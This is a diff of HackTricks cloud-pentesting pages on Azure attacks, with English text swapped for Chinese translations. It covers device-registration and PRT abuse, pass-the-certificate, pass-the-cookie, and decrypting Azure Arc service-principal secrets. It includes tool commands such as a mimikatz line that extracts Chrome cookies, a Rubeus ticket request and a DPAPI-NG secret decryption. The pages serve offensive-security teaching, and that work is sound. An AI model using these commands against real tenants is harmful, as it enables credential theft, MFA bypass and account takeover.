pprint(microsoft_office_bearer_tokens_for_graph_api) ``` - -## References +## 参考文献 - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md index 5fe503c0b..8cc981a73 100644 --- a/src/pentesting-cloud/azure-security/az-device-registration.md +++ b/src/pentesting-cloud/azure-security/az-device-registration.md @@ -1,44 +1,41 @@ -# Az - Device Registration +# Az - 设备注册 {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -When a device joins AzureAD a new object is created in AzureAD. +当设备加入 AzureAD 时,会在 AzureAD 中创建一个新对象。 -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. +在注册设备时,**用户需要使用他的账户登录**(如有需要会要求 MFA),然后请求设备注册服务的令牌,最后询问最终确认提示。 -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: +然后,在设备中生成两个 RSA 密钥对:**设备密钥**(**公**钥)发送到 **AzureAD**,**传输**密钥(**私**钥)如果可能则存储在 TPM 中。 +接着,在 **AzureAD** 中生成 **对象**(而不是在 Intune 中),AzureAD 会向设备返回一个由其签名的 **证书**。您可以检查 **设备是否已加入 AzureAD** 以及有关 **证书** 的信息(例如是否由 TPM 保护)。 ```bash dsregcmd /status ``` +在设备注册后,**主刷新令牌**由LSASS CloudAP模块请求并提供给设备。与PRT一起交付的还有**会话密钥,只有设备可以解密**(使用传输密钥的公钥),并且**使用PRT是必需的。** -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: +有关PRT的更多信息,请查看: {{#ref}} az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md {{#endref}} -### TPM - Trusted Platform Module +### TPM - 受信任的平台模块 -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. +**TPM** **保护**防止从关闭的设备中**提取**密钥(如果由PIN保护)以及从操作系统层提取私有材料。\ +但它**不保护**防止**嗅探**TPM与CPU之间的物理连接或**在系统运行时使用TPM中的加密材料**,这可能来自具有**SYSTEM**权限的进程。 -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): +如果您查看以下页面,您将看到**窃取PRT**可以用于像**用户**一样访问,这很好,因为**PRT位于设备上**,因此可以从它们中窃取(或者如果没有被窃取,则被滥用以生成新的签名密钥): {{#ref}} az-lateral-movement-cloud-on-prem/pass-the-prt.md {{#endref}} -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: +## 使用SSO令牌注册设备 +攻击者可以从被攻陷的设备请求Microsoft设备注册服务的令牌并注册它。 ```bash # Initialize SSO flow roadrecon auth prt-init @@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie # Custom pyhton script to register a device (check roadtx) registerdevice.py ``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. +将为您提供一个**可以用于将来请求PRT的证书**。因此,保持持久性并**绕过MFA**,因为用于注册新设备的原始PRT令牌**已经获得了MFA权限**。 > [!TIP] -> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. +> 请注意,要执行此攻击,您需要有**注册新设备**的权限。此外,注册设备并不意味着该设备将被**允许注册到Intune**。 > [!CAUTION] -> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). +> 此攻击在2021年9月已被修复,因为您无法再使用SSO令牌注册新设备。然而,仍然可以以合法方式注册设备(如果需要,拥有用户名、密码和MFA)。请查看:[**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md)。 -## Overwriting a device ticket +## 覆盖设备票证 -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). +可以**请求设备票证**,**覆盖**设备的当前票证,并在此过程中**窃取PRT**(因此无需从TPM中窃取它。有关更多信息,请[**查看此演讲**](https://youtu.be/BduCn8cLV1A)。
> [!CAUTION] -> However, this was fixed. +> 然而,这已被修复。 -## Overwrite WHFB key +## 覆盖WHFB密钥 -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) +[**在这里查看原始幻灯片**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) -Attack summary: +攻击摘要: -- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -- This also provides **persistence** +- 可以通过SSO**覆盖**来自**设备**的**注册WHFB**密钥 +- 它**击败TPM保护**,因为密钥在新密钥生成期间被**嗅探** +- 这也提供了**持久性**
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: +用户可以通过Azure AD Graph修改自己的searchableDeviceKey属性,然而,攻击者需要在租户中拥有一个设备(动态注册或从合法设备窃取证书+密钥)以及有效的AAD Graph访问令牌。 +然后,可以使用以下方式生成新密钥: ```bash roadtx genhellokey -d -k tempkey.key ``` - -and then PATCH the information of the searchableDeviceKey: +然后PATCH可搜索的DeviceKey的信息:
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: +可以通过**设备代码钓鱼**从用户那里获取访问令牌,并利用之前的步骤**窃取他的访问权限**。有关更多信息,请查看: {{#ref}} az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
-## References +## 参考 - [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) - [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) - [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md index 6a0dce1da..fd4244ab7 100644 --- a/src/pentesting-cloud/azure-security/az-enumeration-tools.md +++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md @@ -2,10 +2,10 @@ {{#include ../../banners/hacktricks-training.md}} -## Install PowerShell in Linux +## 在Linux中安装PowerShell > [!TIP] -> In linux you will need to install PowerShell Core: +> 在Linux中,您需要安装PowerShell Core: > > ```bash > sudo apt-get update @@ -14,11 +14,11 @@ > # Ubuntu 20.04 > wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb > -> # Update repos +> # 更新仓库 > sudo apt-get update > sudo add-apt-repository universe > -> # Install & start powershell +> # 安装并启动powershell > sudo apt-get install -y powershell > pwsh > @@ -26,58 +26,47 @@ > curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash > ``` -## Install PowerShell in MacOS +## 在MacOS中安装PowerShell -Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4): - -1. Install `brew` if not installed yet: +来自[**文档**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4)的说明: +1. 如果尚未安装,请安装`brew`: ```bash /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` - -2. Install the latest stable release of PowerShell: - +2. 安装最新的稳定版本的 PowerShell: ```sh brew install powershell/tap/powershell ``` - -3. Run PowerShell: - +3. 运行 PowerShell: ```sh pwsh ``` - -4. Update: - +4. 更新: ```sh brew update brew upgrade powershell ``` - -## Main Enumeration Tools +## 主要枚举工具 ### az cli -[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts. +[**Azure 命令行界面 (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) 是一个用 Python 编写的跨平台工具,用于管理和管理 (大多数) Azure 和 Entra ID 资源。它连接到 Azure 并通过命令行或脚本执行管理命令。 -Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install). +请按照此链接查看 [**安装说明¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install)。 -Commands in Azure CLI are structured using a pattern of: `az ` +Azure CLI 中的命令使用以下模式结构: `az ` -#### Debug | MitM az cli - -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: +#### 调试 | MitM az cli +使用参数 **`--debug`** 可以查看工具 **`az`** 发送的所有请求: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +为了对工具进行**MitM**并**手动检查所有请求**,您可以执行: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 @@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} ### Az PowerShell -Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line. +Azure PowerShell 是一个模块,包含用于直接从 PowerShell 命令行管理 Azure 资源的 cmdlets。 -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell). +请按照此链接查看 [**安装说明**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell)。 -Commands in Azure PowerShell AZ Module are structured like: `-Az ` +Azure PowerShell AZ 模块中的命令结构如下:`-Az ` #### Debug | MitM Az PowerShell -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: - +使用参数 **`-Debug`** 可以查看工具发送的所有请求: ```bash Get-AzResourceGroup -Debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy). +为了对工具进行**MitM**并**手动检查它发送的所有请求**,您可以根据[**文档**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy)设置环境变量`HTTPS_PROXY`和`HTTP_PROXY`。 ### Microsoft Graph PowerShell -Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features. +Microsoft Graph PowerShell是一个跨平台SDK,能够访问所有Microsoft Graph API,包括SharePoint、Exchange和Outlook等服务,使用单一端点。它支持PowerShell 7+、通过MSAL的现代身份验证、外部身份和高级查询。专注于最小权限访问,确保安全操作,并定期更新以与最新的Microsoft Graph API功能保持一致。 -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation). +请按照此链接查看[**安装说明**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation)。 -Commands in Microsoft Graph PowerShell are structured like: `-Mg ` +Microsoft Graph PowerShell中的命令结构如下:`-Mg ` -#### Debug Microsoft Graph PowerShell - -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: +#### 调试Microsoft Graph PowerShell +使用参数**`-Debug`**可以查看工具发送的所有请求: ```bash Get-MgUser -Debug ``` - ### ~~**AzureAD Powershell**~~ -The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID. +Azure Active Directory (AD) 模块现在 **已弃用**,是用于管理 Azure AD 资源的 Azure PowerShell 的一部分。它提供了用于管理用户、组和 Entra ID 中的应用程序注册的 cmdlet。 > [!TIP] -> This is replaced by Microsoft Graph PowerShell - -Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD). - - - +> 这被 Microsoft Graph PowerShell 替代 +请访问此链接获取 [**安装说明**](https://www.powershellgallery.com/packages/AzureAD)。 diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md index e53ceb412..1636874bb 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md @@ -2,19 +2,18 @@ {{#include ../../../banners/hacktricks-training.md}} -### Identifying the Issues +### 识别问题 -Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1. +Azure Arc 允许通过组策略对象方法将新的内部服务器(加入域的服务器)集成到 Azure Arc 中。为此,微软提供了一个部署工具包,必要用于启动入驻程序。在 ArcEnableServerGroupPolicy.zip 文件中,可以找到以下脚本:DeployGPO.ps1、EnableAzureArc.ps1 和 AzureArcDeployment.psm1。 -When executed, the DeployGPO.ps1 script performs the following actions: +执行时,DeployGPO.ps1 脚本执行以下操作: -1. Creates the Azure Arc Servers Onboarding GPO within the local domain. -2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package. +1. 在本地域中创建 Azure Arc 服务器入驻 GPO。 +2. 将 EnableAzureArc.ps1 入驻脚本复制到为入驻过程创建的指定网络共享中,该共享还包含 Windows 安装包。 -When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script. - -An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments. +运行此脚本时,系统管理员需要提供两个主要参数:**ServicePrincipalId** 和 **ServicePrincipalClientSecret**。此外,还需要其他参数,如域、托管共享的服务器的 FQDN 和共享名称。还必须向脚本提供租户 ID、资源组和其他必要信息等详细信息。 +在指定共享的 AzureArcDeploy 目录中使用 DPAPI-NG 加密生成一个加密的秘密。加密的秘密存储在名为 encryptedServicePrincipalSecret 的文件中。可以在 DeployGPO.ps1 脚本中找到证据,其中通过调用 ProtectBase64 以 $descriptor 和 $ServicePrincipalSecret 作为输入来执行加密。描述符由域计算机和域控制器组 SID 组成,确保 ServicePrincipalSecret 只能由域控制器和域计算机安全组解密,如脚本注释中所述。 ```powershell # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups $DomainComputersSID = "SID=" + $DomainComputersSID @@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR " Import-Module $PSScriptRoot\AzureArcDeployment.psm1 $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret) ``` - ### Exploit -We have the follow conditions: +我们有以下条件: -1. We have successfully penetrated the internal network. -2. We have the capability to create or assume control of a computer account within Active Directory. -3. We have discovered a network share containing the AzureArcDeploy directory. - -There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations. +1. 我们已经成功渗透了内部网络。 +2. 我们有能力在Active Directory中创建或控制计算机账户。 +3. 我们发现了一个包含AzureArcDeploy目录的网络共享。 +在AD环境中获取计算机账户有几种方法。最常见的方法之一是利用计算机账户配额。另一种方法涉及通过脆弱的ACL或各种其他错误配置来破坏计算机账户。 ```powershell Import-MKodule powermad New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` - -Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe. - +一旦获得机器账户,就可以使用该账户进行身份验证。我们可以使用带有 netonly 标志的 runas.exe 命令,或者使用 Rubeus.exe 进行 pass-the-ticket。 ```powershell runas /user:fake01$ /netonly powershell ``` @@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell ```powershell .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr ``` - -By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret. - +通过将计算机帐户的 TGT 存储在内存中,我们可以使用以下脚本解密服务主体密钥。 ```powershell Import-Module .\AzureArcDeployment.psm1 @@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret) $ebs ``` +另外,我们可以使用 [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG)。 -Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG). - -At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal. +此时,我们可以从存储在与 encryptedServicePrincipalSecret 文件相同的网络共享上的 ArcInfo.json 文件中收集连接到 Azure 所需的其余信息。该文件包含以下详细信息:TenantId、servicePrincipalClientId、ResourceGroup 等。凭借这些信息,我们可以使用 Azure CLI 以被攻陷的服务主体身份进行身份验证。 ## References - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md index 2ddcbb0a5..b02aa928a 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md @@ -2,42 +2,38 @@ {{#include ../../../banners/hacktricks-training.md}} -## Local Token Storage and Security Considerations +## 本地令牌存储和安全考虑 -### Azure CLI (Command-Line Interface) +### Azure CLI(命令行界面) -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: +Azure CLI 本地存储令牌和敏感数据,带来安全隐患: -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - - Executed commands with credentials embedded. - - URLs accessed using tokens, potentially revealing sensitive information. +1. **访问令牌**:以明文存储在 `accessTokens.json` 中,位于 `C:\Users\\.Azure`。 +2. **订阅信息**:`azureProfile.json` 在同一目录中,保存订阅详细信息。 +3. **日志文件**:`.azure` 中的 `ErrorRecords` 文件夹可能包含暴露凭据的日志,例如: +- 嵌入凭据的执行命令。 +- 使用令牌访问的 URL,可能泄露敏感信息。 ### Azure PowerShell -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: +Azure PowerShell 也存储令牌和敏感数据,可以本地访问: -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. +1. **访问令牌**:`TokenCache.dat`,位于 `C:\Users\\.Azure`,以明文存储访问令牌。 +2. **服务主体秘密**:这些以未加密形式存储在 `AzureRmContext.json` 中。 +3. **令牌保存功能**:用户可以使用 `Save-AzContext` 命令持久化令牌,需谨慎使用以防止未经授权的访问。 -## Automatic Tools to find them +## 自动工具查找它们 - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) -## Security Recommendations +## 安全建议 -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: +考虑到敏感数据以明文存储,确保这些文件和目录的安全至关重要: -- Limiting access rights to these files. -- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -- Employing encryption for sensitive files where possible. -- Educating users about the risks and best practices for handling such sensitive information. +- 限制对这些文件的访问权限。 +- 定期监控和审计这些目录,以防未经授权的访问或意外更改。 +- 尽可能对敏感文件进行加密。 +- 教育用户有关处理此类敏感信息的风险和最佳实践。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md index f2a5f2f4d..a9fc037fa 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md @@ -4,40 +4,32 @@ ## Pass the Certificate (Azure) -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. +在 Azure 加入的机器中,可以使用 **必须由 Azure AD CA** 为所需用户(作为主题)颁发的证书,从一台机器认证到另一台机器,当两台机器都支持 **NegoEx** 认证机制时。 -In super simplified terms: +简单来说: -- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. +- 发起连接的机器(客户端) **需要 Azure AD 为用户颁发的证书**。 +- 客户端创建一个包含 PRT 和其他详细信息的 JSON Web Token (JWT) 头,使用派生密钥(使用会话密钥和安全上下文)对其进行签名,并 **将其发送到 Azure AD**。 +- Azure AD 使用客户端会话密钥和安全上下文验证 JWT 签名,检查 PRT 的有效性,并 **响应** 以 **证书**。 -In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: +在这种情况下,并在获取所有进行 [**Pass the PRT**](pass-the-prt.md) 攻击所需的信息后: -- Username -- Tenant ID +- 用户名 +- 租户 ID - PRT -- Security context -- Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** +- 安全上下文 +- 派生密钥 +可以使用工具 [**PrtToCert**](https://github.com/morRubin/PrtToCert)** 请求用户的 **P2P 证书**: ```bash RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] ``` - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. - +证书的有效期与PRT相同。要使用证书,可以使用python工具 [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC),该工具将**认证**到远程机器,运行**PSEXEC**并在受害者机器上**打开CMD**。这将允许我们再次使用Mimikatz获取另一个用户的PRT。 ```bash Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP ``` +## 参考文献 -## References - -- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +- 有关 Pass the Certificate 工作原理的更多细节,请查看原始帖子 [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md index f6695c40a..26ab3ae81 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md @@ -2,40 +2,34 @@ {{#include ../../../banners/hacktricks-training.md}} -## Why Cookies? +## 为什么选择 Cookies? -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. +浏览器 **cookies** 是一个很好的机制,可以 **绕过身份验证和 MFA**。因为用户已经在应用程序中进行了身份验证,所以会话 **cookie** 可以直接用于 **访问数据**,而无需重新进行身份验证。 -You can see where are **browser cookies located** in: +您可以查看 **浏览器 cookies 的位置** 在: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome {{#endref}} -## Attack +## 攻击 -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: +具有挑战性的是,这些 **cookies 是通过 Microsoft 数据保护 API (**DPAPI**) 加密的**。这是使用与用户相关的加密 [密钥进行加密](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords),这些 cookies 属于该用户。您可以在以下链接找到更多信息: {{#ref}} https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords {{#endref}} -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - +手握 Mimikatz,我能够 **提取用户的 cookies**,即使它们是加密的,使用以下命令: ```bash mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit ``` +对于 Azure,我们关心的身份验证 cookie 包括 **`ESTSAUTH`**、**`ESTSAUTHPERSISTENT`** 和 **`ESTSAUTHLIGHT`**。这些 cookie 的存在是因为用户最近在 Azure 上活跃。 -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. +只需导航到 login.microsoftonline.com 并添加 cookie **`ESTSAUTHPERSISTENT`**(由“保持登录”选项生成)或 **`ESTSAUTH`**。这样您将被认证。 ## References - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md index 28bc5b415..4cf77de34 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -1,11 +1,7 